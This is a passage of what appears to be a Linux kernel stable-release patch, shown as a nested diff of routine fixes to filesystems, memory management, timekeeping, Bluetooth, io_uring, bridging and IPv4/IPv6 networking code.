++	/* Wait all existing dio workers, newcomers will block on i_rwsem */
++	inode_dio_wait(inode);
+ 	/*
+ 	 * This prevents concurrent writes on other nodes
+ 	 */
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 04a8505bd97af..8a0fa51c9ac68 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -566,7 +566,7 @@ static int __ocfs2_mknod_locked(struct inode *dir,
+ 	fe->i_last_eb_blk = 0;
+ 	strcpy(fe->i_signature, OCFS2_INODE_SIGNATURE);
+ 	fe->i_flags |= cpu_to_le32(OCFS2_VALID_FL);
+-	ktime_get_real_ts64(&ts);
++	ktime_get_coarse_real_ts64(&ts);
+ 	fe->i_atime = fe->i_ctime = fe->i_mtime =
+ 		cpu_to_le64(ts.tv_sec);
+ 	fe->i_mtime_nsec = fe->i_ctime_nsec = fe->i_atime_nsec =
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index 1ec0647a20268..f4d5db3597187 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -383,6 +383,8 @@ static ssize_t __read_vmcore(struct iov_iter *iter, loff_t *fpos)
+ 		/* leave now if filled buffer already */
+ 		if (!iov_iter_count(iter))
+ 			return acc;
++
++		cond_resched();
+ 	}
+ 
+ 	list_for_each_entry(m, &vmcore_list, list) {
+diff --git a/include/linux/i2c.h b/include/linux/i2c.h
+index f7c49bbdb8a18..cfc59c3371cb2 100644
+--- a/include/linux/i2c.h
++++ b/include/linux/i2c.h
+@@ -964,15 +964,33 @@ int i2c_handle_smbus_host_notify(struct i2c_adapter *adap, unsigned short addr);
+ 
+ #endif /* I2C */
+ 
++/* must call put_device() when done with returned i2c_client device */
++struct i2c_client *i2c_find_device_by_fwnode(struct fwnode_handle *fwnode);
++
++/* must call put_device() when done with returned i2c_adapter device */
++struct i2c_adapter *i2c_find_adapter_by_fwnode(struct fwnode_handle *fwnode);
++
++/* must call i2c_put_adapter() when done with returned i2c_adapter device */
++struct i2c_adapter *i2c_get_adapter_by_fwnode(struct fwnode_handle *fwnode);
++
+ #if IS_ENABLED(CONFIG_OF)
+ /* must call put_device() when done with returned i2c_client device */
+-struct i2c_client *of_find_i2c_device_by_node(struct device_node *node);
++static inline struct i2c_client *of_find_i2c_device_by_node(struct device_node *node)
++{
++	return i2c_find_device_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ /* must call put_device() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node);
++static inline struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node)
++{
++	return i2c_find_adapter_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ /* must call i2c_put_adapter() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node);
++static inline struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node)
++{
++	return i2c_get_adapter_by_fwnode(of_fwnode_handle(node));
++}
+ 
+ const struct of_device_id
+ *i2c_of_match_device(const struct of_device_id *matches,
+diff --git a/include/linux/pse-pd/pse.h b/include/linux/pse-pd/pse.h
+index fb724c65c77bc..5ce0cd76956e0 100644
+--- a/include/linux/pse-pd/pse.h
++++ b/include/linux/pse-pd/pse.h
+@@ -114,14 +114,14 @@ static inline int pse_ethtool_get_status(struct pse_control *psec,
+ 					 struct netlink_ext_ack *extack,
+ 					 struct pse_control_status *status)
+ {
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ static inline int pse_ethtool_set_config(struct pse_control *psec,
+ 					 struct netlink_ext_ack *extack,
+ 					 const struct pse_control_config *config)
+ {
+-	return -ENOTSUPP;
++	return -EOPNOTSUPP;
+ }
+ 
+ #endif
+diff --git a/include/linux/serial_core.h b/include/linux/serial_core.h
+index 13bf20242b61a..1c9b3f27f2d36 100644
+--- a/include/linux/serial_core.h
++++ b/include/linux/serial_core.h
+@@ -467,6 +467,7 @@ struct uart_port {
+ 	unsigned char		iotype;			/* io access style */
+ 	unsigned char		quirks;			/* internal quirks */
+ 
++#define UPIO_UNKNOWN		((unsigned char)~0U)	/* UCHAR_MAX */
+ #define UPIO_PORT		(SERIAL_IO_PORT)	/* 8b I/O port access */
+ #define UPIO_HUB6		(SERIAL_IO_HUB6)	/* Hub6 ISA card */
+ #define UPIO_MEM		(SERIAL_IO_MEM)		/* driver-specific */
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index c50a41f1782a4..9df7e29386bcc 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -1936,18 +1936,46 @@ static inline int hci_check_conn_params(u16 min, u16 max, u16 latency,
+ {
+ 	u16 max_latency;
+ 
+-	if (min > max || min < 6 || max > 3200)
++	if (min > max) {
++		BT_WARN("min %d > max %d", min, max);
+ 		return -EINVAL;
++	}
++
++	if (min < 6) {
++		BT_WARN("min %d < 6", min);
++		return -EINVAL;
++	}
++
++	if (max > 3200) {
++		BT_WARN("max %d > 3200", max);
++		return -EINVAL;
++	}
++
++	if (to_multiplier < 10) {
++		BT_WARN("to_multiplier %d < 10", to_multiplier);
++		return -EINVAL;
++	}
+ 
+-	if (to_multiplier < 10 || to_multiplier > 3200)
++	if (to_multiplier > 3200) {
++		BT_WARN("to_multiplier %d > 3200", to_multiplier);
+ 		return -EINVAL;
++	}
+ 
+-	if (max >= to_multiplier * 8)
++	if (max >= to_multiplier * 8) {
++		BT_WARN("max %d >= to_multiplier %d * 8", max, to_multiplier);
+ 		return -EINVAL;
++	}
+ 
+ 	max_latency = (to_multiplier * 4 / max) - 1;
+-	if (latency > 499 || latency > max_latency)
++	if (latency > 499) {
++		BT_WARN("latency %d > 499", latency);
+ 		return -EINVAL;
++	}
++
++	if (latency > max_latency) {
++		BT_WARN("latency %d > max_latency %d", latency, max_latency);
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/include/net/ip_tunnels.h b/include/net/ip_tunnels.h
+index f9906b73e7ff4..0cc077c3dda30 100644
+--- a/include/net/ip_tunnels.h
++++ b/include/net/ip_tunnels.h
+@@ -353,9 +353,10 @@ static inline bool pskb_inet_may_pull(struct sk_buff *skb)
+ 
+ /* Variant of pskb_inet_may_pull().
+  */
+-static inline bool skb_vlan_inet_prepare(struct sk_buff *skb)
++static inline bool skb_vlan_inet_prepare(struct sk_buff *skb,
++					 bool inner_proto_inherit)
+ {
+-	int nhlen = 0, maclen = ETH_HLEN;
++	int nhlen = 0, maclen = inner_proto_inherit ? 0 : ETH_HLEN;
+ 	__be16 type = skb->protocol;
+ 
+ 	/* Essentially this is skb_protocol(skb, true)
+diff --git a/include/scsi/scsi_transport_sas.h b/include/scsi/scsi_transport_sas.h
+index 0e75b9277c8c6..e3b6ce3cbf883 100644
+--- a/include/scsi/scsi_transport_sas.h
++++ b/include/scsi/scsi_transport_sas.h
+@@ -200,6 +200,8 @@ unsigned int sas_is_tlr_enabled(struct scsi_device *);
+ void sas_disable_tlr(struct scsi_device *);
+ void sas_enable_tlr(struct scsi_device *);
+ 
++bool sas_ata_ncq_prio_supported(struct scsi_device *sdev);
++
+ extern struct sas_rphy *sas_end_device_alloc(struct sas_port *);
+ extern struct sas_rphy *sas_expander_alloc(struct sas_port *, enum sas_device_type);
+ void sas_rphy_free(struct sas_rphy *);
+diff --git a/include/trace/events/cachefiles.h b/include/trace/events/cachefiles.h
+index d8d4d73fe7b6a..dff9a48502247 100644
+--- a/include/trace/events/cachefiles.h
++++ b/include/trace/events/cachefiles.h
+@@ -33,6 +33,8 @@ enum cachefiles_obj_ref_trace {
+ 	cachefiles_obj_see_withdrawal,
+ 	cachefiles_obj_get_ondemand_fd,
+ 	cachefiles_obj_put_ondemand_fd,
++	cachefiles_obj_get_read_req,
++	cachefiles_obj_put_read_req,
+ };
+ 
+ enum fscache_why_object_killed {
+@@ -127,7 +129,11 @@ enum cachefiles_error_trace {
+ 	EM(cachefiles_obj_see_lookup_cookie,	"SEE lookup_cookie")	\
+ 	EM(cachefiles_obj_see_lookup_failed,	"SEE lookup_failed")	\
+ 	EM(cachefiles_obj_see_withdraw_cookie,	"SEE withdraw_cookie")	\
+-	E_(cachefiles_obj_see_withdrawal,	"SEE withdrawal")
++	EM(cachefiles_obj_see_withdrawal,	"SEE withdrawal")	\
++	EM(cachefiles_obj_get_ondemand_fd,      "GET ondemand_fd")	\
++	EM(cachefiles_obj_put_ondemand_fd,      "PUT ondemand_fd")	\
++	EM(cachefiles_obj_get_read_req,		"GET read_req")		\
++	E_(cachefiles_obj_put_read_req,		"PUT read_req")
+ 
+ #define cachefiles_coherency_traces					\
+ 	EM(cachefiles_coherency_check_aux,	"BAD aux ")		\
+diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
+index 57ef6850c6a87..55902303d7dc5 100644
+--- a/io_uring/kbuf.c
++++ b/io_uring/kbuf.c
+@@ -154,7 +154,8 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
+ 	req->buf_list = bl;
+ 	req->buf_index = buf->bid;
+ 
+-	if (issue_flags & IO_URING_F_UNLOCKED || !file_can_poll(req->file)) {
++	if (issue_flags & IO_URING_F_UNLOCKED ||
++	    (req->file && !file_can_poll(req->file))) {
+ 		/*
+ 		 * If we came in unlocked, we have no choice but to consume the
+ 		 * buffer here, otherwise nothing ensures that the buffer won't
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 872d149b1959b..413a69aecf5c7 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -5182,6 +5182,7 @@ int perf_event_release_kernel(struct perf_event *event)
+ again:
+ 	mutex_lock(&event->child_mutex);
+ 	list_for_each_entry(child, &event->child_list, child_list) {
++		void *var = NULL;
+ 
+ 		/*
+ 		 * Cannot change, child events are not migrated, see the
+@@ -5222,11 +5223,23 @@ int perf_event_release_kernel(struct perf_event *event)
+ 			 * this can't be the last reference.
+ 			 */
+ 			put_event(event);
++		} else {
++			var = &ctx->refcount;
+ 		}
+ 
+ 		mutex_unlock(&event->child_mutex);
+ 		mutex_unlock(&ctx->mutex);
+ 		put_ctx(ctx);
++
++		if (var) {
++			/*
++			 * If perf_event_free_task() has deleted all events from the
++			 * ctx while the child_mutex got released above, make sure to
++			 * notify about the preceding put_ctx().
++			 */
++			smp_mb(); /* pairs with wait_var_event() */
++			wake_up_var(var);
++		}
+ 		goto again;
+ 	}
+ 	mutex_unlock(&event->child_mutex);
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 7e9a5919299b4..85617928041cf 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -662,15 +662,6 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		} else if (anon_vma_fork(tmp, mpnt))
+ 			goto fail_nomem_anon_vma_fork;
+ 		tmp->vm_flags &= ~(VM_LOCKED | VM_LOCKONFAULT);
+-		/*
+-		 * Copy/update hugetlb private vma information.
+-		 */
+-		if (is_vm_hugetlb_page(tmp))
+-			hugetlb_dup_vma_private(tmp);
+-
+-		if (tmp->vm_ops && tmp->vm_ops->open)
+-			tmp->vm_ops->open(tmp);
+-
+ 		file = tmp->vm_file;
+ 		if (file) {
+ 			struct address_space *mapping = file->f_mapping;
+@@ -687,6 +678,12 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 			i_mmap_unlock_write(mapping);
+ 		}
+ 
++		/*
++		 * Copy/update hugetlb private vma information.
++		 */
++		if (is_vm_hugetlb_page(tmp))
++			hugetlb_dup_vma_private(tmp);
++
+ 		/* Link the vma into the MT */
+ 		mas.index = tmp->vm_start;
+ 		mas.last = tmp->vm_end - 1;
+@@ -698,6 +695,9 @@ static __latent_entropy int dup_mmap(struct mm_struct *mm,
+ 		if (!(tmp->vm_flags & VM_WIPEONFORK))
+ 			retval = copy_page_range(tmp, mpnt);
+ 
++		if (tmp->vm_ops && tmp->vm_ops->open)
++			tmp->vm_ops->open(tmp);
++
+ 		if (retval)
+ 			goto loop_out;
+ 	}
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index fc21c5d5fd5de..1daadbefcee3a 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -214,6 +214,7 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 	 */
+ 	do {
+ 		clear_thread_flag(TIF_SIGPENDING);
++		clear_thread_flag(TIF_NOTIFY_SIGNAL);
+ 		rc = kernel_wait4(-1, NULL, __WALL, NULL);
+ 	} while (rc != -ECHILD);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index e9138cd7a0f52..7f2b17fc8ce40 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -179,26 +179,6 @@ void tick_setup_periodic(struct clock_event_device *dev, int broadcast)
+ 	}
+ }
+ 
+-#ifdef CONFIG_NO_HZ_FULL
+-static void giveup_do_timer(void *info)
+-{
+-	int cpu = *(unsigned int *)info;
+-
+-	WARN_ON(tick_do_timer_cpu != smp_processor_id());
+-
+-	tick_do_timer_cpu = cpu;
+-}
+-
+-static void tick_take_do_timer_from_boot(void)
+-{
+-	int cpu = smp_processor_id();
+-	int from = tick_do_timer_boot_cpu;
+-
+-	if (from >= 0 && from != cpu)
+-		smp_call_function_single(from, giveup_do_timer, &cpu, 1);
+-}
+-#endif
+-
+ /*
+  * Setup the tick device
+  */
+@@ -222,19 +202,25 @@ static void tick_setup_device(struct tick_device *td,
+ 			tick_next_period = ktime_get();
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+-			 * The boot CPU may be nohz_full, in which case set
+-			 * tick_do_timer_boot_cpu so the first housekeeping
+-			 * secondary that comes up will take do_timer from
+-			 * us.
++			 * The boot CPU may be nohz_full, in which case the
++			 * first housekeeping secondary will take do_timer()
++			 * from it.
+ 			 */
+ 			if (tick_nohz_full_cpu(cpu))
+ 				tick_do_timer_boot_cpu = cpu;
+ 
+-		} else if (tick_do_timer_boot_cpu != -1 &&
+-						!tick_nohz_full_cpu(cpu)) {
+-			tick_take_do_timer_from_boot();
++		} else if (tick_do_timer_boot_cpu != -1 && !tick_nohz_full_cpu(cpu)) {
+ 			tick_do_timer_boot_cpu = -1;
+-			WARN_ON(tick_do_timer_cpu != cpu);
++			/*
++			 * The boot CPU will stay in periodic (NOHZ disabled)
++			 * mode until clocksource_done_booting() called after
++			 * smp_init() selects a high resolution clocksource and
++			 * timekeeping_notify() kicks the NOHZ stuff alive.
++			 *
++			 * So this WRITE_ONCE can only race with the READ_ONCE
++			 * check in tick_periodic() but this race is harmless.
++			 */
++			WRITE_ONCE(tick_do_timer_cpu, cpu);
+ #endif
+ 		}
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index be58ce9992595..8067c1e22af9b 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1110,7 +1110,7 @@ static int me_huge_page(struct page_state *ps, struct page *p)
+ 		 * subpages.
+ 		 */
+ 		put_page(hpage);
+-		if (__page_handle_poison(p) >= 0) {
++		if (__page_handle_poison(p) > 0) {
+ 			page_ref_inc(p);
+ 			res = MF_RECOVERED;
+ 		} else {
+@@ -1888,7 +1888,7 @@ static int try_memory_failure_hugetlb(unsigned long pfn, int flags, int *hugetlb
+ 	 */
+ 	if (res == 0) {
+ 		unlock_page(head);
+-		if (__page_handle_poison(p) >= 0) {
++		if (__page_handle_poison(p) > 0) {
+ 			page_ref_inc(p);
+ 			res = MF_RECOVERED;
+ 		} else {
+@@ -2346,6 +2346,13 @@ int unpoison_memory(unsigned long pfn)
+ 		goto unlock_mutex;
+ 	}
+ 
++	if (is_huge_zero_page(page)) {
++		unpoison_pr_info("Unpoison: huge zero page is not supported %#lx\n",
++				 pfn, &unpoison_rs);
++		ret = -EOPNOTSUPP;
++		goto unlock_mutex;
++	}
++
+ 	if (!PageHWPoison(p)) {
+ 		unpoison_pr_info("Unpoison: Page was already unpoisoned %#lx\n",
+ 				 pfn, &unpoison_rs);
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index 67a10a04df041..c5e30b52844c8 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -2923,6 +2923,8 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 		unsigned int order, unsigned int nr_pages, struct page **pages)
+ {
+ 	unsigned int nr_allocated = 0;
++	gfp_t alloc_gfp = gfp;
++	bool nofail = gfp & __GFP_NOFAIL;
+ 	struct page *page;
+ 	int i;
+ 
+@@ -2933,6 +2935,7 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 	 * more permissive.
+ 	 */
+ 	if (!order) {
++		/* bulk allocator doesn't support nofail req. officially */
+ 		gfp_t bulk_gfp = gfp & ~__GFP_NOFAIL;
+ 
+ 		while (nr_allocated < nr_pages) {
+@@ -2971,20 +2974,34 @@ vm_area_alloc_pages(gfp_t gfp, int nid,
+ 			if (nr != nr_pages_request)
+ 				break;
+ 		}
++	} else if (gfp & __GFP_NOFAIL) {
++		/*
++		 * Higher order nofail allocations are really expensive and
++		 * potentially dangerous (pre-mature OOM, disruptive reclaim
++		 * and compaction etc.
++		 */
++		alloc_gfp &= ~__GFP_NOFAIL;
+ 	}
+ 
+ 	/* High-order pages or fallback path if "bulk" fails. */
+-
+ 	while (nr_allocated < nr_pages) {
+-		if (fatal_signal_pending(current))
++		if (!nofail && fatal_signal_pending(current))
+ 			break;
+ 
+ 		if (nid == NUMA_NO_NODE)
+-			page = alloc_pages(gfp, order);
++			page = alloc_pages(alloc_gfp, order);
+ 		else
+-			page = alloc_pages_node(nid, gfp, order);
+-		if (unlikely(!page))
+-			break;
++			page = alloc_pages_node(nid, alloc_gfp, order);
++		if (unlikely(!page)) {
++			if (!nofail)
++				break;
++
++			/* fall back to the zero order allocations */
++			alloc_gfp |= __GFP_NOFAIL;
++			order = 0;
++			continue;
++		}
++
+ 		/*
+ 		 * Higher order allocations must be able to be treated as
+ 		 * indepdenent small pages by callers (as they can with
+diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c
+index 0bffac238b615..a1e0be8716870 100644
+--- a/net/ax25/af_ax25.c
++++ b/net/ax25/af_ax25.c
+@@ -1378,8 +1378,10 @@ static int ax25_accept(struct socket *sock, struct socket *newsock, int flags,
+ {
+ 	struct sk_buff *skb;
+ 	struct sock *newsk;
++	ax25_dev *ax25_dev;
+ 	DEFINE_WAIT(wait);
+ 	struct sock *sk;
++	ax25_cb *ax25;
+ 	int err = 0;
+ 
+ 	if (sock->state != SS_UNCONNECTED)
+@@ -1434,6 +1436,10 @@ static int ax25_accept(struct socket *sock, struct socket *newsock, int flags,
+ 	kfree_skb(skb);
+ 	sk_acceptq_removed(sk);
+ 	newsock->state = SS_CONNECTED;
++	ax25 = sk_to_ax25(newsk);
++	ax25_dev = ax25->ax25_dev;
++	netdev_hold(ax25_dev->dev, &ax25->dev_tracker, GFP_ATOMIC);
++	ax25_dev_hold(ax25_dev);
+ 
+ out:
+ 	release_sock(sk);
+diff --git a/net/ax25/ax25_dev.c b/net/ax25/ax25_dev.c
+index fcc64645bbf5e..e165fe108bb00 100644
+--- a/net/ax25/ax25_dev.c
++++ b/net/ax25/ax25_dev.c
+@@ -193,7 +193,7 @@ void __exit ax25_dev_free(void)
+ 	list_for_each_entry_safe(s, n, &ax25_dev_list, list) {
+ 		netdev_put(s->dev, &s->dev_tracker);
+ 		list_del(&s->list);
+-		kfree(s);
++		ax25_dev_put(s);
+ 	}
+ 	spin_unlock_bh(&ax25_dev_lock);
+ }
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 5f9a599baa34d..a204488a21759 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -5641,13 +5641,7 @@ static inline int l2cap_conn_param_update_req(struct l2cap_conn *conn,
+ 
+ 	memset(&rsp, 0, sizeof(rsp));
+ 
+-	if (max > hcon->le_conn_max_interval) {
+-		BT_DBG("requested connection interval exceeds current bounds.");
+-		err = -EINVAL;
+-	} else {
+-		err = hci_check_conn_params(min, max, latency, to_multiplier);
+-	}
+-
++	err = hci_check_conn_params(min, max, latency, to_multiplier);
+ 	if (err)
+ 		rsp.result = cpu_to_le16(L2CAP_CONN_PARAM_REJECTED);
+ 	else
+diff --git a/net/bpf/test_run.c b/net/bpf/test_run.c
+index 6094ef7cffcd2..64be562f0fe32 100644
+--- a/net/bpf/test_run.c
++++ b/net/bpf/test_run.c
+@@ -841,10 +841,16 @@ static void
+ __bpf_prog_test_run_raw_tp(void *data)
+ {
+ 	struct bpf_raw_tp_test_run_info *info = data;
++	struct bpf_trace_run_ctx run_ctx = {};
++	struct bpf_run_ctx *old_run_ctx;
++
++	old_run_ctx = bpf_set_run_ctx(&run_ctx.run_ctx);
+ 
+ 	rcu_read_lock();
+ 	info->retval = bpf_prog_run(info->prog, info->ctx);
+ 	rcu_read_unlock();
++
++	bpf_reset_run_ctx(old_run_ctx);
+ }
+ 
+ int bpf_prog_test_run_raw_tp(struct bpf_prog *prog,
+diff --git a/net/bridge/br_mst.c b/net/bridge/br_mst.c
+index 3c66141d34d62..1820f09ff59ce 100644
+--- a/net/bridge/br_mst.c
++++ b/net/bridge/br_mst.c
+@@ -73,11 +73,10 @@ int br_mst_get_state(const struct net_device *dev, u16 msti, u8 *state)
+ }
+ EXPORT_SYMBOL_GPL(br_mst_get_state);
+ 
+-static void br_mst_vlan_set_state(struct net_bridge_port *p, struct net_bridge_vlan *v,
++static void br_mst_vlan_set_state(struct net_bridge_vlan_group *vg,
++				  struct net_bridge_vlan *v,
+ 				  u8 state)
+ {
+-	struct net_bridge_vlan_group *vg = nbp_vlan_group(p);
+-
+ 	if (br_vlan_get_state(v) == state)
+ 		return;
+ 
+@@ -103,7 +102,7 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	int err = 0;
+ 
+ 	rcu_read_lock();
+-	vg = nbp_vlan_group(p);
++	vg = nbp_vlan_group_rcu(p);
+ 	if (!vg)
+ 		goto out;
+ 
+@@ -121,7 +120,7 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 		if (v->brvlan->msti != msti)
+ 			continue;
+ 
+-		br_mst_vlan_set_state(p, v, state);
++		br_mst_vlan_set_state(vg, v, state);
+ 	}
+ 
+ out:
+@@ -140,13 +139,13 @@ static void br_mst_vlan_sync_state(struct net_bridge_vlan *pv, u16 msti)
+ 		 * it.
+ 		 */
+ 		if (v != pv && v->brvlan->msti == msti) {
+-			br_mst_vlan_set_state(pv->port, pv, v->state);
++			br_mst_vlan_set_state(vg, pv, v->state);
+ 			return;
+ 		}
+ 	}
+ 
+ 	/* Otherwise, start out in a new MSTI with all ports disabled. */
+-	return br_mst_vlan_set_state(pv->port, pv, BR_STATE_DISABLED);
++	return br_mst_vlan_set_state(vg, pv, BR_STATE_DISABLED);
+ }
+ 
+ int br_mst_vlan_set_msti(struct net_bridge_vlan *mv, u16 msti)
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index aa7ff6a464291..c1fb071eed9b1 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1623,19 +1623,23 @@ void sock_map_close(struct sock *sk, long timeout)
+ 
+ 	lock_sock(sk);
+ 	rcu_read_lock();
+-	psock = sk_psock_get(sk);
+-	if (unlikely(!psock)) {
+-		rcu_read_unlock();
+-		release_sock(sk);
+-		saved_close = READ_ONCE(sk->sk_prot)->close;
+-	} else {
++	psock = sk_psock(sk);
++	if (likely(psock)) {
+ 		saved_close = psock->saved_close;
+ 		sock_map_remove_links(sk, psock);
++		psock = sk_psock_get(sk);
++		if (unlikely(!psock))
++			goto no_psock;
+ 		rcu_read_unlock();
+ 		sk_psock_stop(psock);
+ 		release_sock(sk);
+ 		cancel_delayed_work_sync(&psock->work);
+ 		sk_psock_put(sk, psock);
++	} else {
++		saved_close = READ_ONCE(sk->sk_prot)->close;
++no_psock:
++		rcu_read_unlock();
++		release_sock(sk);
+ 	}
+ 
+ 	/* Make sure we do not recurse. This is a bug.
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 3447a09ee83a2..2d4f697d338f5 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2758,6 +2758,10 @@ void tcp_set_state(struct sock *sk, int state)
+ 		if (oldstate != TCP_ESTABLISHED)
+ 			TCP_INC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
+ 		break;
++	case TCP_CLOSE_WAIT:
++		if (oldstate == TCP_SYN_RECV)
++			TCP_INC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
++		break;
+ 
+ 	case TCP_CLOSE:
+ 		if (oldstate == TCP_CLOSE_WAIT || oldstate == TCP_ESTABLISHED)
+@@ -2769,7 +2773,7 @@ void tcp_set_state(struct sock *sk, int state)
+ 			inet_put_port(sk);
+ 		fallthrough;
+ 	default:
+-		if (oldstate == TCP_ESTABLISHED)
++		if (oldstate == TCP_ESTABLISHED || oldstate == TCP_CLOSE_WAIT)
+ 			TCP_DEC_STATS(sock_net(sk), TCP_MIB_CURRESTAB);
+ 	}
+ 
+diff --git a/net/ipv6/ioam6_iptunnel.c b/net/ipv6/ioam6_iptunnel.c
+index f6f5b83dd954d..a5cfc5b0b206b 100644
+--- a/net/ipv6/ioam6_iptunnel.c
++++ b/net/ipv6/ioam6_iptunnel.c
+@@ -351,9 +351,9 @@ static int ioam6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 		goto drop;
+ 
+ 	if (!ipv6_addr_equal(&orig_daddr, &ipv6_hdr(skb)->daddr)) {
+-		preempt_disable();
++		local_bh_disable();
+ 		dst = dst_cache_get(&ilwt->cache);
+-		preempt_enable();
++		local_bh_enable();
+ 
+ 		if (unlikely(!dst)) {
+ 			struct ipv6hdr *hdr = ipv6_hdr(skb);
+@@ -373,9 +373,9 @@ static int ioam6_output(struct net *net, struct sock *sk, struct sk_buff *skb)
+ 				goto drop;
+ 			}
+ 
+-			preempt_disable();
++			local_bh_disable();
+ 			dst_cache_set_ip6(&ilwt->cache, dst, &fl6.saddr);
+-			preempt_enable();
++			local_bh_enable();
+ 		}
+ 
+ 		skb_dst_drop(skb);
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 8213626434b91..1123594ad2be7 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -962,6 +962,7 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 	if (!fib6_nh->rt6i_pcpu)
+ 		return;
+ 
++	rcu_read_lock();
+ 	/* release the reference to this fib entry from
+ 	 * all of its cached pcpu routes
+ 	 */
+@@ -970,7 +971,9 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 		struct rt6_info *pcpu_rt;
+ 
+ 		ppcpu_rt = per_cpu_ptr(fib6_nh->rt6i_pcpu, cpu);
+-		pcpu_rt = *ppcpu_rt;
++
++		/* Paired with xchg() in rt6_get_pcpu_route() */
++		pcpu_rt = READ_ONCE(*ppcpu_rt);
+ 
+ 		/* only dropping the 'from' reference if the cached route
+ 		 * is using 'match'. The cached pcpu_rt->from only changes
+@@ -984,6 +987,7 @@ static void __fib6_drop_pcpu_from(struct fib6_nh *fib6_nh,
+ 			fib6_info_release(from);
+ 		}
+ 	}
++	rcu_read_unlock();
+ }
+ 
+ struct fib6_nh_pcpu_arg {
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 258e87055836f..d305051e8ab5f 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -1401,6 +1401,7 @@ static struct rt6_info *rt6_get_pcpu_route(const struct fib6_result *res)
+ 		struct rt6_info *prev, **p;
+ 
+ 		p = this_cpu_ptr(res->nh->rt6i_pcpu);
++		/* Paired with READ_ONCE() in __fib6_drop_pcpu_from() */
+ 		prev = xchg(p, NULL);
+ 		if (prev) {
+ 			dst_dev_put(&prev->dst);
+@@ -6334,12 +6335,12 @@ static int ipv6_sysctl_rtcache_flush(struct ctl_table *ctl, int write,
+ 	if (!write)
+ 		return -EINVAL;
+ 
+-	net = (struct net *)ctl->extra1;
+-	delay = net->ipv6.sysctl.flush_delay;
+ 	ret = proc_dointvec(ctl, write, buffer, lenp, ppos);
+ 	if (ret)
+ 		return ret;
+ 
++	net = (struct net *)ctl->extra1;
++	delay = net->ipv6.sysctl.flush_delay;
+ 	fib6_run_gc(delay <= 0 ? 0 : (unsigned long)delay, net, delay > 0);
+ 	return 0;
+ }
+diff --git a/net/ipv6/seg6_iptunnel.c b/net/ipv6/seg6_iptunnel.c
+index 5924407b87b07..ae5299c277bcf 100644
+--- a/net/ipv6/seg6_iptunnel.c
++++ b/net/ipv6/seg6_iptunnel.c
+@@ -464,9 +464,8 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 
+ 	slwt = seg6_lwt_lwtunnel(orig_dst->lwtstate);
+ 
+-	preempt_disable();
++	local_bh_disable();
+ 	dst = dst_cache_get(&slwt->cache);
+-	preempt_enable();
+ 
+ 	skb_dst_drop(skb);
+ 
+@@ -474,14 +473,13 @@ static int seg6_input_core(struct net *net, struct sock *sk,
+ 		ip6_route_input(skb);
+ 		dst = skb_dst(skb);
+ 		if (!dst->error) {
+-			preempt_disable();
+ 			dst_cache_set_ip6(&slwt->cache, dst,
+ 					  &ipv6_hdr(skb)->saddr);
+-			preempt_enable();
+ 		}
+ 	} else {
+ 		skb_dst_set(skb, dst);
+ 	}
++	local_bh_enable();
+ 
